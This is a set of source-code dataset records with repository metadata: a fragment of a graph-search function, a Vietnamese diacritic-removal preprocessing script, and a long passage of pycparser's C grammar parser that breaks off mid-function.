frontier.append((nbour, curr_cost+6))
result = []
for node in range(1, n+1):
if s != node:
result.append(reached.get(node, -1))
return result
| [
"[email protected]"
]
| |
47dd3a6058d1b02752e213e67af6ad515280a64c | 4ddc0d9f83bb9f7dc917749f6085ab1881510bce | /preprocess.py | f045d2bea897ade4e29cf706d4fe1d88e9aadca4 | []
| no_license | dannyng95/VTMS-ER | 0c6a839d4167c3cd312ca41476033d02e0c1caf8 | 9a4eedfaeb67d51268ede29fc82e333ab29e49e9 | refs/heads/main | 2023-01-24T13:45:30.647636 | 2020-12-07T07:03:47 | 2020-12-07T07:03:47 | 318,388,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,019 | py | import pickle
import json
from tqdm import tqdm
import glob2
import codecs
import csv
import re
import sys
import random
import string
import re
# https://realpython.com/python-encodings-guide/
# List of available words with mark in Vietnamese
intab_l = "ạảãàáâậầấẩẫăắằặẳẵóòọõỏôộổỗồốơờớợởỡéèẻẹẽêếềệểễúùụủũưựữửừứíìịỉĩýỳỷỵỹđ"
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
digits = '0123456789'
punctuation = r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
whitespace = ' '
accept_strings = intab_l + ascii_lowercase + digits + punctuation + whitespace
r = re.compile('^[' + accept_strings + ']+$')
#Check Vietnamese function :
def _check_tieng_viet(seq):
if re.match(r, seq.lower()):
return True
else:
return False
# _check_tieng_viet('tiếng việt thần thánh cực kỳ')
# Remove tone Function :
def remove_tone_line(utf8_str):
intab_l = "ạảãàáâậầấẩẫăắằặẳẵóòọõỏôộổỗồốơờớợởỡéèẻẹẽêếềệểễúùụủũưựữửừứíìịỉĩýỳỷỵỹđ"
intab_u = "ẠẢÃÀÁÂẬẦẤẨẪĂẮẰẶẲẴÓÒỌÕỎÔỘỔỖỒỐƠỜỚỢỞỠÉÈẺẸẼÊẾỀỆỂỄÚÙỤỦŨƯỰỮỬỪỨÍÌỊỈĨÝỲỶỴỸĐ"
intab = list(intab_l+intab_u)
outtab_l = "a"*17 + "o"*17 + "e"*11 + "u"*11 + "i"*5 + "y"*5 + "d"
outtab_u = "A"*17 + "O"*17 + "E"*11 + "U"*11 + "I"*5 + "Y"*5 + "D"
outtab = outtab_l + outtab_u
# Using regex to find out the order of alphabe has tone like this 'ạ|ả|ã|...'
r = re.compile("|".join(intab))
# Dictionary replace them from tone to untone. VD: {'â' : 'a'}
replaces_dict = dict(zip(intab, outtab))
# Replace all of them by regex through the order of it
non_dia_str = r.sub(lambda m: replaces_dict[m.group(0)], utf8_str)
return non_dia_str
# remove_tone_line('Đi một ngày đàng học 1 sàng khôn')
| [
"[email protected]"
]
| |
8cb3d749f4466525d40f270c8a048fd83397d6b0 | e25e7f0d944d302c2fd13b7517d97c5e0b5558ec | /FixTree_TBCNN/pycparser/c_parser.py | 9a9d09657ad6d9acb7465f692d2e3c1c7d25ba04 | []
| no_license | NizhenJenny/FixTree | 06702a0d529d861e34b045aac286434b0ce3d86f | be30a2cdeb6cc0aa13f29d2cd4d4ce325f00f2a0 | refs/heads/master | 2020-05-24T21:33:04.030992 | 2019-08-19T09:52:10 | 2019-08-19T09:52:10 | 187,477,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63,913 | py | #------------------------------------------------------------------------------
# pycparser: c_parser.py
#
# CParser class: Parser and AST builder for the C language
#
# Copyright (C) 2008-2015, Eli Bendersky
# License: BSD
#------------------------------------------------------------------------------
import re
from .ply import yacc
from . import c_ast
from .c_lexer import CLexer
from .plyparser import PLYParser, Coord, ParseError
from .ast_transforms import fix_switch_cases
class CParser(PLYParser):
def __init__(
self,
lex_optimize=True,
lextab='pycparser.lextab',
yacc_optimize=True,
yacctab='pycparser.yacctab',
yacc_debug=False,
taboutputdir=''):
""" Create a new CParser.
Some arguments for controlling the debug/optimization
level of the parser are provided. The defaults are
tuned for release/performance mode.
The simple rules for using them are:
*) When tweaking CParser/CLexer, set these to False
*) When releasing a stable parser, set to True
lex_optimize:
Set to False when you're modifying the lexer.
Otherwise, changes in the lexer won't be used, if
some lextab.py file exists.
When releasing with a stable lexer, set to True
to save the re-generation of the lexer table on
each run.
lextab:
Points to the lex table that's used for optimized
mode. Only if you're modifying the lexer and want
some tests to avoid re-generating the table, make
this point to a local lex table file (that's been
earlier generated with lex_optimize=True)
yacc_optimize:
Set to False when you're modifying the parser.
Otherwise, changes in the parser won't be used, if
some parsetab.py file exists.
When releasing with a stable parser, set to True
to save the re-generation of the parser table on
each run.
yacctab:
Points to the yacc table that's used for optimized
mode. Only if you're modifying the parser, make
this point to a local yacc table file
yacc_debug:
Generate a parser.out file that explains how yacc
built the parsing table from the grammar.
taboutputdir:
Set this parameter to control the location of generated
lextab and yacctab files.
"""
self.clex = CLexer(
error_func=self._lex_error_func,
on_lbrace_func=self._lex_on_lbrace_func,
on_rbrace_func=self._lex_on_rbrace_func,
type_lookup_func=self._lex_type_lookup_func)
self.clex.build(
optimize=lex_optimize,
lextab=lextab,
outputdir=taboutputdir)
self.tokens = self.clex.tokens
rules_with_opt = [
'abstract_declarator',
'assignment_expression',
'declaration_list',
'declaration_specifiers',
'designation',
'expression',
'identifier_list',
'init_declarator_list',
'initializer_list',
'parameter_type_list',
'specifier_qualifier_list',
'block_item_list',
'type_qualifier_list',
'struct_declarator_list'
]
for rule in rules_with_opt:
self._create_opt_rule(rule)
self.cparser = yacc.yacc(
module=self,
start='translation_unit_or_empty',
debug=yacc_debug,
optimize=yacc_optimize,
tabmodule=yacctab,
outputdir=taboutputdir)
# Stack of scopes for keeping track of symbols. _scope_stack[-1] is
# the current (topmost) scope. Each scope is a dictionary that
# specifies whether a name is a type. If _scope_stack[n][name] is
# True, 'name' is currently a type in the scope. If it's False,
# 'name' is used in the scope but not as a type (for instance, if we
# saw: int name;
# If 'name' is not a key in _scope_stack[n] then 'name' was not defined
# in this scope at all.
self._scope_stack = [dict()]
# Keeps track of the last token given to yacc (the lookahead token)
self._last_yielded_token = None
def parse(self, text, filename='', debuglevel=0):
""" Parses C code and returns an AST.
text:
A string containing the C source code
filename:
Name of the file being parsed (for meaningful
error messages)
debuglevel:
Debug level to yacc
"""
self.clex.filename = filename
self.clex.reset_lineno()
self._scope_stack = [dict()]
self._last_yielded_token = None
return self.cparser.parse(
input=text,
lexer=self.clex,
debug=debuglevel)
######################-- PRIVATE --######################
def _push_scope(self):
self._scope_stack.append(dict())
def _pop_scope(self):
assert len(self._scope_stack) > 1
self._scope_stack.pop()
def _add_typedef_name(self, name, coord):
""" Add a new typedef name (ie a TYPEID) to the current scope
"""
if not self._scope_stack[-1].get(name, True):
self._parse_error(
"Typedef %r previously declared as non-typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = True
def _add_identifier(self, name, coord):
""" Add a new object, function, or enum member name (ie an ID) to the
current scope
"""
if self._scope_stack[-1].get(name, False):
self._parse_error(
"Non-typedef %r previously declared as typedef "
"in this scope" % name, coord)
self._scope_stack[-1][name] = False
def _is_type_in_scope(self, name):
""" Is *name* a typedef-name in the current scope?
"""
for scope in reversed(self._scope_stack):
# If name is an identifier in this scope it shadows typedefs in
# higher scopes.
in_scope = scope.get(name)
if in_scope is not None: return in_scope
return False
def _lex_error_func(self, msg, line, column):
self._parse_error(msg, self._coord(line, column))
def _lex_on_lbrace_func(self):
self._push_scope()
def _lex_on_rbrace_func(self):
self._pop_scope()
def _lex_type_lookup_func(self, name):
""" Looks up types that were previously defined with
typedef.
Passed to the lexer for recognizing identifiers that
are types.
"""
is_type = self._is_type_in_scope(name)
return is_type
def _get_yacc_lookahead_token(self):
""" We need access to yacc's lookahead token in certain cases.
This is the last token yacc requested from the lexer, so we
ask the lexer.
"""
return self.clex.last_token
# To understand what's going on here, read sections A.8.5 and
# A.8.6 of K&R2 very carefully.
#
# A C type consists of a basic type declaration, with a list
# of modifiers. For example:
#
# int *c[5];
#
# The basic declaration here is 'int c', and the pointer and
# the array are the modifiers.
#
# Basic declarations are represented by TypeDecl (from module c_ast) and the
# modifiers are FuncDecl, PtrDecl and ArrayDecl.
#
# The standard states that whenever a new modifier is parsed, it should be
# added to the end of the list of modifiers. For example:
#
# K&R2 A.8.6.2: Array Declarators
#
# In a declaration T D where D has the form
# D1 [constant-expression-opt]
# and the type of the identifier in the declaration T D1 is
# "type-modifier T", the type of the
# identifier of D is "type-modifier array of T"
#
# This is what this method does. The declarator it receives
# can be a list of declarators ending with TypeDecl. It
# tacks the modifier to the end of this list, just before
# the TypeDecl.
#
# Additionally, the modifier may be a list itself. This is
# useful for pointers, that can come as a chain from the rule
# p_pointer. In this case, the whole modifier list is spliced
# into the new location.
def _type_modify_decl(self, decl, modifier):
""" Tacks a type modifier on a declarator, and returns
the modified declarator.
Note: the declarator and modifier may be modified
"""
#~ print '****'
#~ decl.show(offset=3)
#~ modifier.show(offset=3)
#~ print '****'
modifier_head = modifier
modifier_tail = modifier
# The modifier may be a nested list. Reach its tail.
#
while modifier_tail.type:
modifier_tail = modifier_tail.type
# If the decl is a basic type, just tack the modifier onto
# it
#
if isinstance(decl, c_ast.TypeDecl):
modifier_tail.type = decl
return modifier
else:
# Otherwise, the decl is a list of modifiers. Reach
# its tail and splice the modifier onto the tail,
# pointing to the underlying basic type.
#
decl_tail = decl
while not isinstance(decl_tail.type, c_ast.TypeDecl):
decl_tail = decl_tail.type
modifier_tail.type = decl_tail.type
decl_tail.type = modifier_head
return decl
# Due to the order in which declarators are constructed,
# they have to be fixed in order to look like a normal AST.
#
# When a declaration arrives from syntax construction, it has
# these problems:
# * The innermost TypeDecl has no type (because the basic
# type is only known at the uppermost declaration level)
# * The declaration has no variable name, since that is saved
# in the innermost TypeDecl
# * The typename of the declaration is a list of type
# specifiers, and not a node. Here, basic identifier types
# should be separated from more complex types like enums
# and structs.
#
# This method fixes these problems.
#
def _fix_decl_name_type(self, decl, typename):
""" Fixes a declaration. Modifies decl.
"""
# Reach the underlying basic type
#
type = decl
while not isinstance(type, c_ast.TypeDecl):
type = type.type
decl.name = type.declname
type.quals = decl.quals
# The typename is a list of types. If any type in this
# list isn't an IdentifierType, it must be the only
# type in the list (it's illegal to declare "int enum ..")
# If all the types are basic, they're collected in the
# IdentifierType holder.
#
for tn in typename:
if not isinstance(tn, c_ast.IdentifierType):
if len(typename) > 1:
self._parse_error(
"Invalid multiple types specified", tn.coord)
else:
type.type = tn
return decl
if not typename:
# Functions default to returning int
#
if not isinstance(decl.type, c_ast.FuncDecl):
self._parse_error(
"Missing type in declaration", decl.coord)
type.type = c_ast.IdentifierType(
['int'],
coord=decl.coord)
else:
# At this point, we know that typename is a list of IdentifierType
# nodes. Concatenate all the names into a single list.
#
type.type = c_ast.IdentifierType(
[name for id in typename for name in id.names],
coord=typename[0].coord)
return decl
def _add_declaration_specifier(self, declspec, newspec, kind):
""" Declaration specifiers are represented by a dictionary
with the entries:
* qual: a list of type qualifiers
* storage: a list of storage type qualifiers
* type: a list of type specifiers
* function: a list of function specifiers
This method is given a declaration specifier, and a
new specifier of a given kind.
Returns the declaration specifier, with the new
specifier incorporated.
"""
spec = declspec or dict(qual=[], storage=[], type=[], function=[])
spec[kind].insert(0, newspec)
return spec
def _build_declarations(self, spec, decls, typedef_namespace=False):
""" Builds a list of declarations all sharing the given specifiers.
If typedef_namespace is true, each declared name is added
to the "typedef namespace", which also includes objects,
functions, and enum constants.
"""
is_typedef = 'typedef' in spec['storage']
declarations = []
# Bit-fields are allowed to be unnamed.
#
if decls[0].get('bitsize') is not None:
pass
# When redeclaring typedef names as identifiers in inner scopes, a
# problem can occur where the identifier gets grouped into
# spec['type'], leaving decl as None. This can only occur for the
# first declarator.
#
elif decls[0]['decl'] is None:
if len(spec['type']) < 2 or len(spec['type'][-1].names) != 1 or \
not self._is_type_in_scope(spec['type'][-1].names[0]):
coord = '?'
for t in spec['type']:
if hasattr(t, 'coord'):
coord = t.coord
break
self._parse_error('Invalid declaration', coord)
# Make this look as if it came from "direct_declarator:ID"
decls[0]['decl'] = c_ast.TypeDecl(
declname=spec['type'][-1].names[0],
type=None,
quals=None,
coord=spec['type'][-1].coord)
# Remove the "new" type's name from the end of spec['type']
del spec['type'][-1]
# A similar problem can occur where the declaration ends up looking
# like an abstract declarator. Give it a name if this is the case.
#
elif not isinstance(decls[0]['decl'],
(c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
decls_0_tail = decls[0]['decl']
while not isinstance(decls_0_tail, c_ast.TypeDecl):
decls_0_tail = decls_0_tail.type
if decls_0_tail.declname is None:
decls_0_tail.declname = spec['type'][-1].names[0]
del spec['type'][-1]
for decl in decls:
assert decl['decl'] is not None
if is_typedef:
declaration = c_ast.Typedef(
name=None,
quals=spec['qual'],
storage=spec['storage'],
type=decl['decl'],
coord=decl['decl'].coord)
else:
declaration = c_ast.Decl(
name=None,
quals=spec['qual'],
storage=spec['storage'],
funcspec=spec['function'],
type=decl['decl'],
init=decl.get('init'),
bitsize=decl.get('bitsize'),
coord=decl['decl'].coord)
if isinstance(declaration.type,
(c_ast.Struct, c_ast.Union, c_ast.IdentifierType)):
fixed_decl = declaration
else:
fixed_decl = self._fix_decl_name_type(declaration, spec['type'])
# Add the type name defined by typedef to a
# symbol table (for usage in the lexer)
#
if typedef_namespace:
if is_typedef:
self._add_typedef_name(fixed_decl.name, fixed_decl.coord)
else:
self._add_identifier(fixed_decl.name, fixed_decl.coord)
declarations.append(fixed_decl)
return declarations
def _build_function_definition(self, spec, decl, param_decls, body):
""" Builds a function definition.
"""
assert 'typedef' not in spec['storage']
declaration = self._build_declarations(
spec=spec,
decls=[dict(decl=decl, init=None)],
typedef_namespace=True)[0]
return c_ast.FuncDef(
decl=declaration,
param_decls=param_decls,
body=body,
coord=decl.coord)
def _select_struct_union_class(self, token):
""" Given a token (either STRUCT or UNION), selects the
appropriate AST class.
"""
if token == 'struct':
return c_ast.Struct
else:
return c_ast.Union
##
## Precedence and associativity of operators
##
precedence = (
('left', 'LOR'),
('left', 'LAND'),
('left', 'OR'),
('left', 'XOR'),
('left', 'AND'),
('left', 'EQ', 'NE'),
('left', 'GT', 'GE', 'LT', 'LE'),
('left', 'RSHIFT', 'LSHIFT'),
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE', 'MOD')
)
##
## Grammar productions
## Implementation of the BNF defined in K&R2 A.13
##
# Wrapper around a translation unit, to allow for empty input.
# Not strictly part of the C99 Grammar, but useful in practice.
#
def p_translation_unit_or_empty(self, p):
""" translation_unit_or_empty : translation_unit
| empty
"""
if p[1] is None:
p[0] = c_ast.FileAST([])
else:
p[0] = c_ast.FileAST(p[1])
def p_translation_unit_1(self, p):
""" translation_unit : external_declaration
"""
# Note: external_declaration is already a list
#
p[0] = p[1]
def p_translation_unit_2(self, p):
""" translation_unit : translation_unit external_declaration
"""
if p[2] is not None:
p[1].extend(p[2])
p[0] = p[1]
# Declarations always come as lists (because they can be
# several in one line), so we wrap the function definition
# into a list as well, to make the return value of
# external_declaration homogenous.
#
def p_external_declaration_1(self, p):
""" external_declaration : function_definition
"""
p[0] = [p[1]]
def p_external_declaration_2(self, p):
""" external_declaration : declaration
"""
p[0] = p[1]
def p_external_declaration_3(self, p):
""" external_declaration : pp_directive
"""
p[0] = p[1]
def p_external_declaration_4(self, p):
""" external_declaration : SEMI
"""
p[0] = None
def p_pp_directive(self, p):
""" pp_directive : PPHASH
"""
self._parse_error('Directives not supported yet',
self._coord(p.lineno(1)))
# In function definitions, the declarator can be followed by
# a declaration list, for old "K&R style" function definitios.
#
def p_function_definition_1(self, p):
""" function_definition : declarator declaration_list_opt compound_statement
"""
# no declaration specifiers - 'int' becomes the default type
spec = dict(
qual=[],
storage=[],
type=[c_ast.IdentifierType(['int'],
coord=self._coord(p.lineno(1)))],
function=[])
p[0] = self._build_function_definition(
spec=spec,
decl=p[1],
param_decls=p[2],
body=p[3])
def p_function_definition_2(self, p):
""" function_definition : declaration_specifiers declarator declaration_list_opt compound_statement
"""
spec = p[1]
p[0] = self._build_function_definition(
spec=spec,
decl=p[2],
param_decls=p[3],
body=p[4])
def p_statement(self, p):
""" statement : labeled_statement
| expression_statement
| compound_statement
| selection_statement
| iteration_statement
| jump_statement
"""
p[0] = p[1]
# In C, declarations can come several in a line:
# int x, *px, romulo = 5;
#
# However, for the AST, we will split them to separate Decl
# nodes.
#
# This rule splits its declarations and always returns a list
# of Decl nodes, even if it's one element long.
#
def p_decl_body(self, p):
""" decl_body : declaration_specifiers init_declarator_list_opt
"""
spec = p[1]
# p[2] (init_declarator_list_opt) is either a list or None
#
if p[2] is None:
# By the standard, you must have at least one declarator unless
# declaring a structure tag, a union tag, or the members of an
# enumeration.
#
ty = spec['type']
s_u_or_e = (c_ast.Struct, c_ast.Union, c_ast.Enum)
if len(ty) == 1 and isinstance(ty[0], s_u_or_e):
decls = [c_ast.Decl(
name=None,
quals=spec['qual'],
storage=spec['storage'],
funcspec=spec['function'],
type=ty[0],
init=None,
bitsize=None,
coord=ty[0].coord)]
# However, this case can also occur on redeclared identifiers in
# an inner scope. The trouble is that the redeclared type's name
# gets grouped into declaration_specifiers; _build_declarations
# compensates for this.
#
else:
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=None, init=None)],
typedef_namespace=True)
else:
decls = self._build_declarations(
spec=spec,
decls=p[2],
typedef_namespace=True)
p[0] = decls
# The declaration has been split to a decl_body sub-rule and
# SEMI, because having them in a single rule created a problem
# for defining typedefs.
#
# If a typedef line was directly followed by a line using the
# type defined with the typedef, the type would not be
# recognized. This is because to reduce the declaration rule,
# the parser's lookahead asked for the token after SEMI, which
# was the type from the next line, and the lexer had no chance
# to see the updated type symbol table.
#
# Splitting solves this problem, because after seeing SEMI,
# the parser reduces decl_body, which actually adds the new
# type into the table to be seen by the lexer before the next
# line is reached.
def p_declaration(self, p):
""" declaration : decl_body SEMI
"""
p[0] = p[1]
# Since each declaration is a list of declarations, this
# rule will combine all the declarations and return a single
# list
#
def p_declaration_list(self, p):
""" declaration_list : declaration
| declaration_list declaration
"""
p[0] = p[1] if len(p) == 2 else p[1] + p[2]
def p_declaration_specifiers_1(self, p):
""" declaration_specifiers : type_qualifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'qual')
def p_declaration_specifiers_2(self, p):
""" declaration_specifiers : type_specifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'type')
def p_declaration_specifiers_3(self, p):
""" declaration_specifiers : storage_class_specifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'storage')
def p_declaration_specifiers_4(self, p):
""" declaration_specifiers : function_specifier declaration_specifiers_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'function')
def p_storage_class_specifier(self, p):
""" storage_class_specifier : AUTO
| REGISTER
| STATIC
| EXTERN
| TYPEDEF
"""
p[0] = p[1]
def p_function_specifier(self, p):
""" function_specifier : INLINE
"""
p[0] = p[1]
def p_type_specifier_1(self, p):
""" type_specifier : VOID
| _BOOL
| CHAR
| SHORT
| INT
| LONG
| FLOAT
| DOUBLE
| _COMPLEX
| SIGNED
| UNSIGNED
"""
p[0] = c_ast.IdentifierType([p[1]], coord=self._coord(p.lineno(1)))
def p_type_specifier_2(self, p):
""" type_specifier : typedef_name
| enum_specifier
| struct_or_union_specifier
"""
p[0] = p[1]
def p_type_qualifier(self, p):
""" type_qualifier : CONST
| RESTRICT
| VOLATILE
"""
p[0] = p[1]
def p_init_declarator_list_1(self, p):
""" init_declarator_list : init_declarator
| init_declarator_list COMMA init_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# If the code is declaring a variable that was declared a typedef in an
# outer scope, yacc will think the name is part of declaration_specifiers,
# not init_declarator, and will then get confused by EQUALS. Pass None
# up in place of declarator, and handle this at a higher level.
#
def p_init_declarator_list_2(self, p):
""" init_declarator_list : EQUALS initializer
"""
p[0] = [dict(decl=None, init=p[2])]
# Similarly, if the code contains duplicate typedefs of, for example,
# array types, the array portion will appear as an abstract declarator.
#
def p_init_declarator_list_3(self, p):
""" init_declarator_list : abstract_declarator
"""
p[0] = [dict(decl=p[1], init=None)]
# Returns a {decl=<declarator> : init=<initializer>} dictionary
# If there's no initializer, uses None
#
def p_init_declarator(self, p):
""" init_declarator : declarator
| declarator EQUALS initializer
"""
p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None))
def p_specifier_qualifier_list_1(self, p):
""" specifier_qualifier_list : type_qualifier specifier_qualifier_list_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'qual')
def p_specifier_qualifier_list_2(self, p):
""" specifier_qualifier_list : type_specifier specifier_qualifier_list_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'type')
# TYPEID is allowed here (and in other struct/enum related tag names), because
# struct/enum tags reside in their own namespace and can be named the same as types
#
def p_struct_or_union_specifier_1(self, p):
""" struct_or_union_specifier : struct_or_union ID
| struct_or_union TYPEID
"""
klass = self._select_struct_union_class(p[1])
p[0] = klass(
name=p[2],
decls=None,
coord=self._coord(p.lineno(2)))
def p_struct_or_union_specifier_2(self, p):
""" struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close
"""
klass = self._select_struct_union_class(p[1])
p[0] = klass(
name=None,
decls=p[3],
coord=self._coord(p.lineno(2)))
def p_struct_or_union_specifier_3(self, p):
""" struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close
| struct_or_union TYPEID brace_open struct_declaration_list brace_close
"""
klass = self._select_struct_union_class(p[1])
p[0] = klass(
name=p[2],
decls=p[4],
coord=self._coord(p.lineno(2)))
def p_struct_or_union(self, p):
""" struct_or_union : STRUCT
| UNION
"""
p[0] = p[1]
# Combine all declarations into a single list
#
def p_struct_declaration_list(self, p):
""" struct_declaration_list : struct_declaration
| struct_declaration_list struct_declaration
"""
p[0] = p[1] if len(p) == 2 else p[1] + p[2]
def p_struct_declaration_1(self, p):
""" struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI
"""
spec = p[1]
assert 'typedef' not in spec['storage']
if p[2] is not None:
decls = self._build_declarations(
spec=spec,
decls=p[2])
elif len(spec['type']) == 1:
# Anonymous struct/union, gcc extension, C1x feature.
# Although the standard only allows structs/unions here, I see no
# reason to disallow other types since some compilers have typedefs
# here, and pycparser isn't about rejecting all invalid code.
#
node = spec['type'][0]
if isinstance(node, c_ast.Node):
decl_type = node
else:
decl_type = c_ast.IdentifierType(node)
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=decl_type)])
else:
# Structure/union members can have the same names as typedefs.
# The trouble is that the member's name gets grouped into
# specifier_qualifier_list; _build_declarations compensates.
#
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=None, init=None)])
p[0] = decls
def p_struct_declaration_2(self, p):
""" struct_declaration : specifier_qualifier_list abstract_declarator SEMI
"""
# "Abstract declarator?!", you ask? Structure members can have the
# same names as typedefs. The trouble is that the member's name gets
# grouped into specifier_qualifier_list, leaving any remainder to
# appear as an abstract declarator, as in:
# typedef int Foo;
# struct { Foo Foo[3]; };
#
p[0] = self._build_declarations(
spec=p[1],
decls=[dict(decl=p[2], init=None)])
def p_struct_declarator_list(self, p):
""" struct_declarator_list : struct_declarator
| struct_declarator_list COMMA struct_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# struct_declarator passes up a dict with the keys: decl (for
# the underlying declarator) and bitsize (for the bitsize)
#
def p_struct_declarator_1(self, p):
""" struct_declarator : declarator
"""
p[0] = {'decl': p[1], 'bitsize': None}
def p_struct_declarator_2(self, p):
""" struct_declarator : declarator COLON constant_expression
| COLON constant_expression
"""
if len(p) > 3:
p[0] = {'decl': p[1], 'bitsize': p[3]}
else:
p[0] = {'decl': c_ast.TypeDecl(None, None, None), 'bitsize': p[2]}
def p_enum_specifier_1(self, p):
""" enum_specifier : ENUM ID
| ENUM TYPEID
"""
p[0] = c_ast.Enum(p[2], None, self._coord(p.lineno(1)))
def p_enum_specifier_2(self, p):
""" enum_specifier : ENUM brace_open enumerator_list brace_close
"""
p[0] = c_ast.Enum(None, p[3], self._coord(p.lineno(1)))
def p_enum_specifier_3(self, p):
""" enum_specifier : ENUM ID brace_open enumerator_list brace_close
| ENUM TYPEID brace_open enumerator_list brace_close
"""
p[0] = c_ast.Enum(p[2], p[4], self._coord(p.lineno(1)))
def p_enumerator_list(self, p):
""" enumerator_list : enumerator
| enumerator_list COMMA
| enumerator_list COMMA enumerator
"""
if len(p) == 2:
p[0] = c_ast.EnumeratorList([p[1]], p[1].coord)
elif len(p) == 3:
p[0] = p[1]
else:
p[1].enumerators.append(p[3])
p[0] = p[1]
def p_enumerator(self, p):
""" enumerator : ID
| ID EQUALS constant_expression
"""
if len(p) == 2:
enumerator = c_ast.Enumerator(
p[1], None,
self._coord(p.lineno(1)))
else:
enumerator = c_ast.Enumerator(
p[1], p[3],
self._coord(p.lineno(1)))
self._add_identifier(enumerator.name, enumerator.coord)
p[0] = enumerator
def p_declarator_1(self, p):
""" declarator : direct_declarator
"""
p[0] = p[1]
def p_declarator_2(self, p):
""" declarator : pointer direct_declarator
"""
p[0] = self._type_modify_decl(p[2], p[1])
# Since it's impossible for a type to be specified after a pointer, assume
# it's intended to be the name for this declaration. _add_identifier will
# raise an error if this TYPEID can't be redeclared.
#
def p_declarator_3(self, p):
""" declarator : pointer TYPEID
"""
decl = c_ast.TypeDecl(
declname=p[2],
type=None,
quals=None,
coord=self._coord(p.lineno(2)))
p[0] = self._type_modify_decl(decl, p[1])
def p_direct_declarator_1(self, p):
""" direct_declarator : ID
"""
p[0] = c_ast.TypeDecl(
declname=p[1],
type=None,
quals=None,
coord=self._coord(p.lineno(1)))
def p_direct_declarator_2(self, p):
""" direct_declarator : LPAREN declarator RPAREN
"""
p[0] = p[2]
def p_direct_declarator_3(self, p):
""" direct_declarator : direct_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET
"""
quals = (p[3] if len(p) > 5 else []) or []
# Accept dimension qualifiers
# Per C99 6.7.5.3 p7
arr = c_ast.ArrayDecl(
type=None,
dim=p[4] if len(p) > 5 else p[3],
dim_quals=quals,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_declarator_4(self, p):
""" direct_declarator : direct_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET
| direct_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET
"""
# Using slice notation for PLY objects doesn't work in Python 3 for the
# version of PLY embedded with pycparser; see PLY Google Code issue 30.
# Work around that here by listing the two elements separately.
listed_quals = [item if isinstance(item, list) else [item]
for item in [p[3],p[4]]]
dim_quals = [qual for sublist in listed_quals for qual in sublist
if qual is not None]
arr = c_ast.ArrayDecl(
type=None,
dim=p[5],
dim_quals=dim_quals,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
# Special for VLAs
#
def p_direct_declarator_5(self, p):
""" direct_declarator : direct_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[4], self._coord(p.lineno(4))),
dim_quals=p[3] if p[3] != None else [],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_declarator_6(self, p):
""" direct_declarator : direct_declarator LPAREN parameter_type_list RPAREN
| direct_declarator LPAREN identifier_list_opt RPAREN
"""
func = c_ast.FuncDecl(
args=p[3],
type=None,
coord=p[1].coord)
# To see why _get_yacc_lookahead_token is needed, consider:
# typedef char TT;
# void foo(int TT) { TT = 10; }
# Outside the function, TT is a typedef, but inside (starting and
# ending with the braces) it's a parameter. The trouble begins with
# yacc's lookahead token. We don't know if we're declaring or
# defining a function until we see LBRACE, but if we wait for yacc to
# trigger a rule on that token, then TT will have already been read
# and incorrectly interpreted as TYPEID. We need to add the
# parameters to the scope the moment the lexer sees LBRACE.
#
if self._get_yacc_lookahead_token().type == "LBRACE":
if func.args is not None:
for param in func.args.params:
if isinstance(param, c_ast.EllipsisParam): break
self._add_identifier(param.name, param.coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_pointer(self, p):
""" pointer : TIMES type_qualifier_list_opt
| TIMES type_qualifier_list_opt pointer
"""
coord = self._coord(p.lineno(1))
# Pointer decls nest from inside out. This is important when different
# levels have different qualifiers. For example:
#
# char * const * p;
#
# Means "pointer to const pointer to char"
#
# While:
#
# char ** const p;
#
# Means "const pointer to pointer to char"
#
# So when we construct PtrDecl nestings, the leftmost pointer goes in
# as the most nested type.
nested_type = c_ast.PtrDecl(quals=p[2] or [], type=None, coord=coord)
if len(p) > 3:
tail_type = p[3]
while tail_type.type is not None:
tail_type = tail_type.type
tail_type.type = nested_type
p[0] = p[3]
else:
p[0] = nested_type
def p_type_qualifier_list(self, p):
""" type_qualifier_list : type_qualifier
| type_qualifier_list type_qualifier
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
def p_parameter_type_list(self, p):
""" parameter_type_list : parameter_list
| parameter_list COMMA ELLIPSIS
"""
if len(p) > 2:
p[1].params.append(c_ast.EllipsisParam(self._coord(p.lineno(3))))
p[0] = p[1]
def p_parameter_list(self, p):
""" parameter_list : parameter_declaration
| parameter_list COMMA parameter_declaration
"""
if len(p) == 2: # single parameter
p[0] = c_ast.ParamList([p[1]], p[1].coord)
else:
p[1].params.append(p[3])
p[0] = p[1]
def p_parameter_declaration_1(self, p):
""" parameter_declaration : declaration_specifiers declarator
"""
spec = p[1]
if not spec['type']:
spec['type'] = [c_ast.IdentifierType(['int'],
coord=self._coord(p.lineno(1)))]
